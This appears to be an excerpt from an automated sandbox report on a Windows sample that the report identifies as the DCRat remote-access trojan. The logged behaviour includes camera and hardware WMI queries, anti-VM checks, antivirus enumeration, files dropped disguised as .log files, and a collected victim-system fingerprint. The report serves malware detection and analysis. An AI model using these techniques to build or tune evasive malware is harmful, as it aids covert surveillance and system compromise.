                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Uses ping.exe to sleep
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeMemory allocated: 1AE80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1A600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599320Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599092Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598982Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598872Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598759Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598652Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598521Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598299Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 3600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598151Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597481Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595887Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595658Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595536Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595402Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595137Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594688Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594563Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594125Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594016Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeWindow / User API: threadDelayed 2259Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeWindow / User API: threadDelayed 7517Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\smdnokfM.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\DDWtiErR.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\vZNEzLck.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\MEQTIppb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\eQsYbLKq.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\jDKXEIae.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZFopJXMZ.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\BRqdbrgY.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\hADxImWJ.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\EGcTfavm.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\vXIDvyqF.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\YRkhYJRb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeDropped PE file which has not been started: C:\Users\user\Desktop\aIuPGtQu.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeDropped PE file which has not been started: C:\Users\user\Desktop\dNlyfpHV.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exe TID: 7468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7744Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599320s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -599092s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598982s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598872s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598759s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598652s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598521s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598299s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7884Thread sleep time: -3600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598151s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -598031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597921s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597594s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597481s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597141s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -597016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595887s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595658s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595536s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595402s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595137s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -595016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594125s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exe TID: 7900Thread sleep time: -594016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B7FEC5A GetSystemInfo,0_2_00007FFD9B7FEC5A
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599320Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599092Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598982Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598872Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598759Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598652Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598521Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598299Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 3600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598151Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597481Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595887Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595658Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595536Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595402Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595137Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594688Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594563Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594125Jump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594016Jump to behavior
                  Source: staticfile.exe, 00000006.00000002.4175035756.000000001BF39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe" Jump to behavior
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: B)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / Unit
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000274E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.4",5,1,"","user","965543","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local","9WBFV6_K (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
                  Source: staticfile.exe, 00000006.00000002.4162410596.000000000274E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeQueries volume information: C:\Users\user\Desktop\lfcdgbuksf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: staticfile.exe, 00000006.00000002.4175035756.000000001BF39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected DCRat
                  Source: Yara matchFile source: lfcdgbuksf.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.lfcdgbuksf.exe.960000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1679174176.0000000000962000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lfcdgbuksf.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: staticfile.exe PID: 7740, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\staticfile.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected DCRat
                  Source: Yara matchFile source: lfcdgbuksf.exe, type: SAMPLE
